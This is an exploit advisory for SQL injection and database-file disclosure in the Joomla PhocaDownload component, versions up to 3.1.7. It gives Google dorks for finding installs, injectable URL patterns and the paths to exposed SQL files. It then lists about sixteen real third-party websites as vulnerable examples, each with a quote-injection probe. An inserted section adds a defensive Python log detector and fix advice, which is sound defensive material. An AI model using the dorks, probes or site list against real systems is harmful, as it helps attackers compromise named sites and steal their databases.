####################################################################
# Exploit Title : Joomla PhocaDownload Components 3.1.7 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/02/2019
# Vendor Homepage : phoca.cz
# Software Download Links : phoca.cz/download/category/4-phoca-download-component
github.com/PhocaCz/PhocaDownload/releases/download/3.1.7/com_phocadownload_v3.1.7.zip
github.com/PhocaCz/PhocaDownload/releases/download/2.1.9/com_phocadownload_v2.1.9.zip
github.com/PhocaCz/PhocaDownload/releases/download/1.3.9/com_phocadownload_v1.3.9.zip
# Software Information Link : extensions.joomla.org/extension/phoca-download/
# Software Versions : 1.3.9, 2.1.9, 3.1.5, 3.1.7
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_phocadownload''
intext:Powered by Phoca Download
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
Phoca Download is a download manager for Joomla! CMS. It includes a
component, modules and plugins and allows displaying files on a website
which can be downloaded (previewed, played) by website visitors.
Downloaded files are listed in the Statistics View (administration).
####################################################################
# Impact :
***********
The Joomla PhocaDownload 3.1.7 component and previous versions
are prone to an SQL-injection vulnerability because the component fails to sufficiently sanitize
user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application
and execute arbitrary SQL commands in the application's database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser.
* This software is also prone to an information exposure/database disclosure vulnerability.
Successful exploits of this issue may allow an attacker to obtain sensitive
information by downloading the full contents of the application's database.
* Any remote user may download the database files and gain access
to sensitive information including unencrypted authentication credentials.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_phocadownload&view=category&id=[SQL Injection]
/index.php?option=com_phocadownload&view=category&download=[SQL Injection]
/index.php?option=com_phocadownload&view=categories&Itemid=[SQL Injection]
/index.php?option=com_phocadownload&view=sections&Itemid=[SQL Injection]
/index.php?option=com_phocadownload&view=category&id=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_phocadownload&view=category&id=[ID-NUMBER]:[FOLDER-NAME]&Itemid=[SQL Injection]
/index.php?option=com_phocadownload&view=category&id=[ID-NUMBER]::[FOLDER-NAME]&download=[ID-NUMBER]::[FOLDER-NAME]&[ID-NUMBER]&start=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_phocadownload&view=category&download=[ID-NUMBER]:[FOLDER-NAME]&id=[ID-NUMBER]:[FOLDER-NAME]&Itemid=[SQL Injection]
# Database Disclosure Exploit :
****************************
/administrator/components/com_phocadownload/install/sql/mysql/.......
/administrator/components/com_phocadownload/install.sql
/administrator/components/com_phocadownload/uninstall.sql
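Added example (not part of the advisory and not Phoca or Joomla code): a small Python detector that covers both findings above, the SQL injection probes against the id/Itemid/download parameters and direct requests for the install/uninstall SQL files. It parses constructed Apache/nginx combined-format access log lines and flags a com_phocadownload request whose injectable parameter does not match the legitimate shape. The allowlist pattern (an integer, optionally followed by ":slug", modelled on Joomla's id:alias slugs), the log format regex and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths the advisory lists as directly downloadable SQL schema files.
SQL_FILE_PATHS = (
    "/administrator/components/com_phocadownload/install.sql",
    "/administrator/components/com_phocadownload/uninstall.sql",
)
SQL_DIR_PREFIX = "/administrator/components/com_phocadownload/install/sql/"

# Parameters the advisory names as injection points. A legitimate value is
# assumed to be an integer or an integer followed by ":slug" (Joomla id:alias).
INJECTABLE_PARAMS = ("id", "Itemid", "download")
LEGIT_VALUE = re.compile(r"^\d+(:[\w-]+)?$")

# Simplified Apache/nginx combined log format (assumption for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return a finding label for a request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = parts.path
    # Direct fetch of the component's SQL schema files (database disclosure).
    if path in SQL_FILE_PATHS or path.startswith(SQL_DIR_PREFIX):
        return "phocadownload-sql-file-disclosure"
    qs = parse_qs(parts.query)  # percent-decodes once, so %27 becomes a quote
    if qs.get("option", [""])[0] != "com_phocadownload":
        return None
    for name in INJECTABLE_PARAMS:
        for value in qs.get(name, []):
            # Anything outside the strict allowlist (quotes, comments, UNION ...)
            # is treated as an injection probe against that parameter.
            if not LEGIT_VALUE.match(value):
                return "phocadownload-sqli-probe:" + name
    return None


def scan_log(lines):
    """Return (client_ip, finding, http_status) for every suspicious log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as combined log format
        hit = classify_request(m.group("target"))
        if hit:
            findings.append((m.group("ip"), hit, m.group("status")))
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Feb/2019:10:01:02 +0000] "GET /index.php?option=com_phocadownload&view=category&id=13 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Feb/2019:10:01:09 +0000] "GET /index.php?option=com_phocadownload&view=category&id=4:formulir-lain-lain&Itemid=155%27 HTTP/1.1" 500 311',
    '198.51.100.7 - - [04/Feb/2019:10:02:40 +0000] "GET /administrator/components/com_phocadownload/uninstall.sql HTTP/1.1" 200 980',
    '198.51.100.7 - - [04/Feb/2019:10:02:41 +0000] "GET /index.php?option=com_content&view=article&id=5%27 HTTP/1.1" 200 4400',
    '192.0.2.9 - - [04/Feb/2019:10:03:00 +0000] "GET /index.php?option=com_phocadownload&view=category&id=1%3Adocumenti-generici&download=8%3Araccolta-tappi-bra&Itemid=55 HTTP/1.1" 200 2200',
]

if __name__ == "__main__":
    for ip, finding, status in scan_log(SAMPLE_LOG):
        print(ip, finding, "status=" + status)
```

The allowlist in LEGIT_VALUE is also the shape of the server-side fix: cast id/Itemid to an integer (or validate the id:alias slug) before the value reaches a query, and bind it as a parameter. A 200 response for the uninstall.sql path indicates the installer's SQL files are readable by anyone; after installation they should not be served by the web server at all.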
####################################################################
# Example Vulnerable Sites :
*************************
[+] traumhaftes-wandermaerchen.de/index.php?option=
com_phocadownload&view=category&download=
7:oberlinspher-weg&id=1:gps-tracks&Itemid=12%27
[+] medic.usm.my/kkkk/index.php?option=
com_phocadownload&view=category&download=
1:borang-tempahan-pinjaman-perabot-pokok-hiasan
&id=1:forms&Itemid=257%27
[+] paroki-blokb.org/index.php?option=
com_phocadownload&view=
category&id=4:formulir-lain-lain&Itemid=155%27
[+] emanuelecardi.it/WEB/index.php?option=
com_phocadownload&view=categories&Itemid=147%27
[+] skisiklos.hu/index.php?option=
com_phocadownload&view=category&id=13
[+] dch.hu/hu/?option=
com_phocadownload&view=category&id=1:rlistk&Itemid=1%27
[+] onfartigianatocalabria.it/index.php?option=
com_phocadownload&view=category&id=3&Itemid=117%27
[+] seport.com.br/index.php?option=
com_phocadownload&view=category&id=2:resolues
&download=43:resoluo-n-11&start=20&Itemid=37%27
[+] anticapievediverdeto.it/joomla/index.php?option=
com_phocadownload&view=sections&Itemid=72%27
[+] ampelos.org/ampelos.org/index.php?option=
com_phocadownload&view=category&id=
1%3Adocumenti-generici&download=
8%3Araccolta-tappi-bra&Itemid=55%27
[+] ftdlotgenoten.nl/site/index.php?option=
com_phocadownload&view=category&download=
4:ftd-nieuwsflits-5&id=1%27
[+] polechatenay.lifb.org/index.php?option=
com_phocadownload&view=category&id=1:interclubs
&download=1893:lifb1819crireglementv1a03sanctions&Itemid=26%27
[+] vestex.com.gt/old/index.php?option=
com_phocadownload&view=category&id=
17:rse&Itemid=250%27
[+] zcdt.org.zw/index.php?option=
com_phocadownload&view=category&download=
2:weekly-exercise&id=1:downloads&Itemid=23%27
[+] zcdt.org.zw/administrator/components
/com_phocadownload/uninstall.sql
[+] ipesp.ac.th/web-stu/index.php?option=
com_phocadownload&view=category&download=
10:7&id=1%27
####################################################################
# Example SQL Database Error :
****************************
Strict Standards: Only variables should be assigned by reference in
/home/eijpju/public_html/components/com_phocadownload
/views/category/view.html.php on line 29
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################